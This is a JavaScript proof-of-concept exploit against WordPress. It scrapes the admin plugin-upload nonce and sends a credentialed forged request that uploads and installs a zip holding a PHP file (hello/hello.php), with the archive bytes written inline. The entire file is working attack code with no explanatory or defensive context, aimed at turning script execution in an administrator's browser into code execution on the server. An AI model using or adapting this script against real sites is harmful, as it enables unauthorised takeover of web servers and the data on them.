function sRequest(token)
{
 var xhr = new XMLHttpRequest();
 xhr.open("POST", "http://localhost/wordpress/wp-admin/update.php?action=upload-plugin", true);
 xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
 xhr.setRequestHeader("Accept-Language", "pl,en-US;q=0.7,en;q=0.3");
 xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------12586301018622");
 xhr.withCredentials = true;
 var body = "-----------------------------12586301018622\r\n" + 
   "Content-Disposition: form-data; name=\"_wpnonce\"\r\n" + 
   "\r\n" + 
   token + "\r\n" + 
   "-----------------------------12586301018622\r\n" + 
   "Content-Disposition: form-data; name=\"_wp_http_referer\"\r\n" + 
   "\r\n" + 
   "/wordpress/wp-admin/plugin-install.php?tab=upload\r\n" + 
   "-----------------------------12586301018622\r\n" + 
   "Content-Disposition: form-data; name=\"pluginzip\"; filename=\"hello.zip\"\r\n" + 
   "Content-Type: application/x-zip-compressed\r\n" + 
   "\r\n" + 
   "PK\x03\x04\x14\x00\x00\x00\x08\x00\xe4\x89eF\x07\xf5U\xd1\x12\x04\x00\x00\xf1\x08\x00\x00\x0f\x00\x00\x00hello/hello.php\xedU]o\xdb6\x14}\xb6~\xc5\x85\x17@n`G\xcd\xc3\xf6\xe0:\xc9\x8auk\x0b\xac\xdd\xb0t\x0b\x86\xae0\x18\xe9Z\xe2B\x91\x04IE\xd6\x86\xfe\xf7\x1dRJ\xe2\x0c\x19\xb0\xbd\x0f0\x0c\xfb\xf2~\x9c{\xce\xe5\xe5\xe6\xc266+\x8e\x8f3:\xa6\xaf\xad(oD\xcd\xf4\x86\x952\xdbWF\xa9!\xd9o\xd9yi4\x9d\x9e|\x85\xff\x05\xfc\xb3\x1fUWKM\xefE\xcb\xeb\xd1\x9fF\xff\xe9\xe0\xe7\x9f\xde\xae\xa9\t\xc1\xae\x8b\xa27\xae\xb2\x8e\xbd?1\xae.lr\xf0E\x13\x83VU\x0c*\xb2W\xecK\'m@\x955}h\xa4\'|\xb4\t\xf4{\xe7\x03\t\x1a\x83\x96$\x03\xf9\xa1\xbd6J\xfe\xc1\x9eB\xc3\xd4\x18\xcb$tE\xacC\xd3y)|Kf\x07K4H\xc7T\xb3f\'bf\xf2]\xdbrE\x9d% \x0c\xbd\xa1\x88\xcc\xc3\xackj\r\n" + 
   "\xedDk:\xaf\x06\xba\x1e\xe8{\xd3\x01\xc3K\xd7\xfa\xe0\x8c\xae\xa7.\x97c\x9b\'t\xd5\xb0&Q\x06y+\x02r\x0e\xa6\xa3^*E\x0eXL\x8b\x14\x9e\x81\x8b\xd4\xe0dI;gZ\xda\x942\xf0\xf9a\x96M\x91L\t\rZ\xe9\xaceGN\xd6M\x88- \xa5#Q\xb58\x059\x8crh\x81\xa1\xc5@\x16*\x9dd/\xbb\xd0\x18\xb7\xa6w\"\x04z\xd7)\xc5\xba\xe7:\xfbeTk\x9d\xe4\x1a}\x1e\xc9\xd1\x8a\x93\x10\x8a\x0c:f\xbbN\x97\x89\x99$\xc66\x89\xb1\xad9l\x13\xec\xc53\xfa3\x9ba8\xa0\x08{t\x036#\xcet\x08\xf6\xcd\xa1\xf0q.fG\xd3\xd1\x19\xcd\x0f\xfb\xcc\xae\xf0g9\x16\xb93\xbd\r9\x987\xa4e\xc91U#n9\xb1x\x8d!\xa4\xbea7\xfde\x05\xf6\xb3_M\x97\xc3\xa2\x8c\xb9\x91:\'\xdf\xa7\x8cS**!w8\xb0L\xde\x3eDEjez\xc4,c\xba\x07k\xe9\x92\xf5o\xae&%O\x82\x034\xed\x98Uj\xd9\x19\x08\xe8{1\xc4\x90\xabF\xaa\x91\x89k\x88\x8d6\xac\x1a\x0f~\xd0|/\x9cQ\x15\xc6\xe9\x16?!1\x1a\xd5\xb5\x1f\xc7\x00I\xee{\xd4\xd9%\x08\t\xe2\x06s\x0c\xe9{\'\xec\x12E\x95\x12\x3e\xfbNb\xa8\xa35\x8erk\xc3@\xea\xe04\xf5\x99\x03\xb2\x8e\x13\x01\xe0$bbQ\x0b\xa9\xb3\xff\xb9\xffW\xdc\xbf\x8ex\x97X\x10\xfc\x04\xe9t+\xd0Y\xa0\x1b}p\xfc4\xeb\xff\xcd\x3cj4\x7f\x91\xe1j\x15\xb8A \xa0\x07H\xab\xb0\xdb\xe2GC\x10%5\xfb\xc3\xeb\xc4{\xabL\xc5\x0b\x9a\xff\xa6\xe7K\xba;x6ey\t\xd4!.\xa4\xfb\xedS6\xc6\xf8\xb4\x80\x90*\x9b9\x0e\x9d\xd3\xd4\xdb\xc0{\xfc\xc2\xf6\\\xdc%\xf9Hm\xd8\xc6\xb8\x05=_Ri:\x1d\x16\x0f\x05hE\xa7\xf8\xfe\x14K}\xce2\xd4J\xdb9\xadeF\x91i\x0b\xe3\x97G\xf9Xl\x89vb\xd3\xd6x\x99v\x0b\x9aR\xd8\x91\xee\xc9m3\xee\x98\xa3)\xfe\xec\x9f\x16\xd1\x8bl\x16\xab\xd1|\x83\xdd]\x9d\xe5\xc9!?\x9f\xe26\x85=\x9f\xdf\xe1{o\xfaD(\x07 \x13\xd8\xe9wU\xb1\xf6A-\xef\xb9\xec0\x15q\x02\x12\xf4\xb4a\xb7xkp\x19|\xda\xe8\x11\xb3\xc7\\c\xa1V\xc8(\xaaj;\x9a\x17\x94?\xf2\xc6\\\xe7\x07\x80\xf3\xa4\x07 `z15\x15&\xafe\xfa\xe6\xf22\xd6\xbd\xa7#\xd6\xb4\xc2\x89\x1a\x97\xbdy\xe0dl\xb9\xf4~\xda\xba\x13\xd1-vC|\xa1\xd2\xea\x15a\x8c\x9eRI\x3c[p\x11\n" + 
   "W\xb96\x063o\xa6\xe7c\x15\xccJ\xf1.\x12\xaf\xeb\x0e\x8fE\x1c\xa6=\xe8\x95~\xeb\x82B\x89\x0b\xca\xa3CNk\xcaSH\x1eGi\xe48\x9bm|\x18\xe25\x1b,\x9f\xe5qd\n" + 
   "\x00\xcb\xcf\xb3\xd9\x17\tf\x048\xdb)#\xc2\x9a\x8e\xf6\xd0ffA\x12\xe0\xac\x8e\xf6xv\xbe\xb4\x8fl\xc1\xd85E\xdbl\x06k+\x1c^\xf25=\x8f.;\xa3\xc3\xcac\x1a\x11u\x9a\xa2\x3e\xa3x\x91\xaa\xa3Z\xd24a\xf2\x91\xe6m\xd4nq\xb4}\xfd\xed\x87\x8fy\xd9V\xf9\'\xf0\xfd\xa4\x3e\r\x8b*\x8asO\xea(\xcd\xc5y\xf6\x17PK\x01\x02\x14\x00\x14\x00\x00\x00\x08\x00\xe4\x89eF\x07\xf5U\xd1\x12\x04\x00\x00\xf1\x08\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x00\x00\x00\x00\x00\x00\x00hello/hello.phpPK\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00=\x00\x00\x00?\x04\x00\x00\x00\x00\r\n" + 
   "-----------------------------12586301018622\r\n" + 
   "Content-Disposition: form-data; name=\"install-plugin-submit\"\r\n" + 
   "\r\n" + 
   "Zainstaluj\r\n" + 
   "-----------------------------12586301018622--\r\n";
 var aBody = new Uint8Array(body.length);
 for (var i = 0; i < aBody.length; i++)
   aBody[i] = body.charCodeAt(i); 
 xhr.send(new Blob([aBody]));
 }

function getToken()
{
var url = "http://localhost/wordpress/wp-admin/plugin-install.php?tab=upload"; 
var xmlhttp = new XMLHttpRequest(); 
xmlhttp.open("GET", url,true);

xmlhttp.onreadystatechange=function() {
  if (xmlhttp.readyState==4) {
   var www = xmlhttp.responseText;
      var re = www.match(/<input type=\"hidden\" id=\"_wpnonce\" name=\"_wpnonce\" value=\"[^~]*?\" \/>/ig);
      token = re[0].match(/([a-z0-9]{10})/g);
   console.log('xhr',xmlhttp);
  }
 }
 xmlhttp.send(null);
    return token;
}

var x = getToken();
sRequest(x[0]);